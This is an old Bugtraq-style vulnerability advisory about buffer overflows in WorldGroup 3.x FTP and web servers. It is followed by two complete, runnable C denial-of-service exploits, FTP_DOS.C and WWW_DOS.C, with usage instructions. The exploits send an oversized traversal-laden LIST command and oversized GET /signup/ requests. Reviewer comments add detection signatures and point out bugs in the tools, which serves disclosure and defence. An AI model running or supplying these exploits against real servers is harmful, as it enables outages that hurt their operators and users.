Dear bugtraq,

Topic: buffer overflows in WorldGroup 3.0 ftp and web servers
Authors: Limpid Byte team (http://lbyte.void.ru, lbyte@host.sk)
Date: February, 25 2002
Software: WorldGroup 3.x
Vendor: Galacticomm (http://www.gcomm.com/) (?)
Risk: High
Remote: Yes
Exploitable: Yes
Vendor Status: Not contacted, not confirmed

Details: Limpid Byte team (http://lbyte.void.ru, lbyte@host.sk) reports buffer overflows in WorldGroup 3.x ftp and web servers by Galacticomm (http://www.gcomm.com/). For the FTP server, the overflow is triggered by a long LIST command. For the HTTP server, it is triggered by a long request: GET /signup/a.[aaaaaaaa....aaaa] HTTP/1.0

Vendor: Vendor was not contacted because contact information is not available on the Web site (support only available for registered users).

Exploit: DoS exploits by Limpid Byte team (also available from http://www.security.nnov.ru/files/worldgroupdos.zip)

----------------- BEGIN FTP_DOS.C ---------------------
/* by Limpid Byte project http://lbyte.void.ru lbyte@host.sk [Worldgroup FTP Server Denial of Service] More than 105 "/" in LIST command.
*/
/*
 * Reviewer notes (defender's reading of this proof of concept):
 *
 * What it does: connects to port 21, logs in (USER/PASS), sends PASV
 * (the data connection is never opened), then sends one LIST command whose
 * argument is a long run of "*" and "/../" segments. The advisory above
 * says more than 105 '/' characters in the LIST argument crash the server.
 * The page classifies this as a DoS; the tool does nothing after the crash.
 *
 * Detection: an FTP LIST argument made of dozens of "/../" traversal
 * segments is a simple wire signature; legitimate clients never send it.
 *
 * Defects in this client itself (it is a PoC, not robust code):
 *  - cgiBuff[recv(...)] = 0 uses the recv() return value as an index.
 *    On Winsock recv() returns SOCKET_ERROR (-1) on failure, which makes
 *    this write cgiBuff[-1] -- an out-of-bounds write in the tool itself.
 *    The "sizeof - 1" argument keeps the index in range only on success.
 *  - socket() and every send() are unchecked; the socket is never closed
 *    with closesocket() (the process exit is relied on).
 *  - FTP lines are terminated with a bare "\n" (RFC 959 requires CRLF),
 *    and the banner strings use "\n\r", the reverse of CRLF.
 *  - FOUND is defined but never used in this program.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock.h>

#define FOUND "220"   /* unused in this program */

int main(int argc, char *argv[])
{
    int sock;
    struct sockaddr_in blah;
    struct hostent *he;
    char cgiBuff[1024];
    char *cgiPage[6];
    WSADATA wsaData;
    char cr[] = "\n";   /* line terminator sent after each command (LF only, not CRLF) */

    if (argc < 3) {
        printf("\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nThis program crash Worldgroup servers 3.xx for windows 95/98/ME/NT/2K.");
        printf("\n\rGreets to [WhU]//[GiN]//[LByte]//[WGHACK] projects!\n\r USAGE:\n\r");
        printf("Ftp_dos.exe [HOST] [LOGIN] [PASSWORD] ");
        printf("\n\r example : fpt_dos.exe 127.0.0.1 anonymous anonymous@127.0.0.1 \n");
        exit(1);
    }

    /* Command sequence. cgiPage[5] is the oversized LIST argument; it already
     * ends in "\n", and cr is sent after it as well, so an empty line follows. */
    cgiPage[0] = "USER ";
    cgiPage[1] = (argv[2]);
    cgiPage[2] = "PASS ";
    cgiPage[3] = (argv[3]);
    cgiPage[4] = "PASV";
    cgiPage[5] = "LIST */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../\n";

    /* 0x101 requests Winsock 1.1. */
    if(WSAStartup(0x101,&wsaData)) {
        printf("Unable to initialize WinSock lib.\n");
        exit(1);
    }
    printf("Let's crash the World!\n\r");
    printf("Coded by the [eaSt]:\n\r");
    printf("\nConnecting %s on port 21...\n\n", argv[1]);

    sock = socket(AF_INET,SOCK_STREAM,0);   /* return value (INVALID_SOCKET) not checked */
    blah.sin_family=AF_INET;
    blah.sin_addr.s_addr=inet_addr(argv[1]);   /* overwritten by the resolution below */
    blah.sin_port=htons(21);
    /* Resolve as a host name first, then fall back to dotted-quad parsing. */
    if ((he = gethostbyname(argv[1])) != NULL) {
        memcpy((char *)&blah.sin_addr, he->h_addr, he->h_length);
    } else {
        if ((blah.sin_addr.s_addr = inet_addr(argv[1]))==INADDR_NONE) {
            WSACleanup();
            exit(1);
        }
    }
    if (connect(sock,(struct sockaddr*)&blah,sizeof(blah))!=0) {
        WSACleanup();
        exit(1);
    }

    /* Banner. NOTE(review): a recv() failure (-1) indexes cgiBuff[-1] here and
     * at every later recv() -- undefined behaviour in the tool. */
    memset(cgiBuff, 0, sizeof(cgiBuff));
    cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0;
    printf("<< %s", cgiBuff);

    /* USER <login> */
    send(sock,cgiPage[0],strlen(cgiPage[0]),0);
    send(sock,cgiPage[1],strlen(cgiPage[1]),0);
    send(sock,cr,1,0);
    memset(cgiBuff, 0, sizeof(cgiBuff));
    cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0;
    printf(">> %s %s\n<< %s", cgiPage[0], cgiPage[1], cgiBuff);

    /* PASS <password> */
    send(sock,cgiPage[2],strlen(cgiPage[2]),0);
    send(sock,cgiPage[3],strlen(cgiPage[3]),0);
    send(sock,cr,1,0);
    memset(cgiBuff, 0, sizeof(cgiBuff));
    cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0;
    printf(">> %s %s\n<< %s", cgiPage[2], cgiPage[3], cgiBuff);

    /* PASV -- reply is printed but the advertised data port is never used. */
    send(sock,cgiPage[4],strlen(cgiPage[4]),0);
    send(sock,cr,1,0);
    memset(cgiBuff, 0, sizeof(cgiBuff));
    cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0;
    printf(">> %s\n<< %s", cgiPage[4], cgiBuff);

    /* The oversized LIST; whatever the server answers (or a closed
     * connection) is printed. */
    send(sock,cgiPage[5],strlen(cgiPage[5]),0);
    send(sock,cr,1,0);
    memset(cgiBuff, 0, sizeof(cgiBuff));
    cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0;
    printf(">> %s\n<< %s", cgiPage[5], cgiBuff);

    printf("Try reconnect to %s\n", argv[1]);
    WSACleanup();   /* sock itself is never closed */
    return 0;
}
----------------- END FTP_DOS.C ---------------------
----------------- BEGIN WWW_DOS.C ---------------------
/* by Limpid Byte project http://lbyte.void.ru lbyte@host.sk
   Worldgroup Server Denial of Service for Windows 9x/ME only.
   Error between system function windows and worldgroup from web interface.
   REQUEST: GET /signup/a.[aaaaaaaa....aaaa] */
/*
 * Reviewer notes (defender's reading of this proof of concept):
 *
 * What it does: opens 94 successive connections to port 80 and on each one
 * sends "GET /signup/" followed by a run of 'a' bytes that grows from 219 to
 * 312 characters, then ".txt?=../test.txt HTTP/1.0" and a blank line. A
 * recv() that returns 0 (peer closed the connection) is reported as a crash.
 *
 * Detection: a request for /signup/ with a path segment of several hundred
 * identical bytes, plus "../" in the query string, is easy to match in web
 * server or proxy logs.
 *
 * Defects in this client itself:
 *  - The request is built with sprintf()/memset() at fixed offsets. The
 *    longest request is 12 + 312 + 28 = 352 bytes, so it stays inside the
 *    1024-byte cgiBuff, but nothing enforces that.
 *  - Only a 0 return from recv() counts as "Crashed"; SOCKET_ERROR (-1, e.g.
 *    a reset connection) falls into the else branch and is printed as
 *    "Not Found" with whatever the zeroed buffer holds.
 *  - The reply is read with the full sizeof(cgiBuff), so a full read has no
 *    terminator; cgiBuff[32] = 0 is what makes the later %s safe.
 *  - strstr(cgiBuff, "200") matches "200" anywhere in the first 32 bytes,
 *    not specifically the status line.
 *  - strlen() is printed with "%d" (size_t wants "%zu"); socket(), send()
 *    are unchecked; on connect() failure the socket is leaked before exit.
 *  - The request is terminated with "\n\n" rather than CRLF CRLF.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock.h>

#define FOUND "200"   /* HTTP status code searched for in the reply */

int main(int argc, char *argv[])
{
    int sock, count;
    struct sockaddr_in blah;
    struct hostent *he;
    char cgiBuff[1024];
    WSADATA wsaData;

    if (argc < 2) {
        printf("\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nThis program crash Worldgroup servers 3.20 for windows 95/98/ME.\n");
        printf("Greets to [WhU]//[GiN]//[LByte]//[WGHACK] projects!\n\n");
        printf(" USAGE : www_dos.exe [HOST] \n");
        printf(" example : www_dos.exe 127.0.0.1 \n");
        exit(1);
    }
    /* 0x101 requests Winsock 1.1. */
    if(WSAStartup(0x101,&wsaData)) {
        printf("Unable to initialize WinSock lib.\n");
        exit(1);
    }
    printf("Let's crash the World!\n");
    printf("Coded by the [eaSt]:\n");
    printf("\nScanning %s on port 80...\n\n", argv[1]);

    /* One connection per iteration; the 'a' run is 219 + count bytes long. */
    for (count = 0; count < 94; count++) {
        sock = socket(AF_INET,SOCK_STREAM,0);   /* return value not checked */
        blah.sin_family=AF_INET;
        blah.sin_addr.s_addr=inet_addr(argv[1]);   /* overwritten by the resolution below */
        blah.sin_port=htons(80);
        /* Resolve as a host name first, then fall back to dotted-quad parsing. */
        if ((he = gethostbyname(argv[1])) != NULL) {
            memcpy((char *)&blah.sin_addr, he->h_addr, he->h_length);
        } else {
            if ((blah.sin_addr.s_addr = inet_addr(argv[1]))==INADDR_NONE) {
                WSACleanup();
                exit(1);
            }
        }
        if (connect(sock,(struct sockaddr*)&blah,sizeof(blah))!=0) {
            WSACleanup();   /* sock is not closed before exit */
            exit(1);
        }

        /* Build the request at fixed offsets: 12-byte prefix, 219+count 'a's,
         * 28-byte suffix (max 352 bytes in total). */
        memset(cgiBuff, 0, sizeof(cgiBuff));
        sprintf(cgiBuff, "GET /signup/");
        memset(cgiBuff + 12, 'a', 219 + count);
        sprintf(cgiBuff + 12 + 219 + count, ".txt?=../test.txt HTTP/1.0\n\n");
        printf("Sending: %d symbols request\n", strlen(cgiBuff));   /* size_t printed with %d */
        send(sock,cgiBuff,strlen(cgiBuff),0);

        /* 0 = orderly close, reported as a crash; -1 (SOCKET_ERROR) is not
         * distinguished from a real reply. */
        memset(cgiBuff, 0, sizeof(cgiBuff));
        if(!recv(sock,cgiBuff,sizeof(cgiBuff),0)) {
            printf("Crashed\n");
        } else {
            cgiBuff[32] = 0;   /* truncate (and terminate) for printing */
            if (strstr(cgiBuff,FOUND)) {
                printf("Send (%s)\n", cgiBuff);
            } else {
                printf("Not Found (%s)\n", cgiBuff);
            }
        }
        closesocket(sock);
    }
    printf("Try reconnect to %s\n", argv[1]);
    WSACleanup();
    return 0;
}
----------------- END WWW_DOS.C ---------------------
-- http://www.security.nnov.ru /\_/\ { , . } |\ +--oQQo->{ ^ }<-----+ \ | ZARAZA U 3APA3A } +-------------o66o--+ / |/ You know my name - look up my number (The Beatles)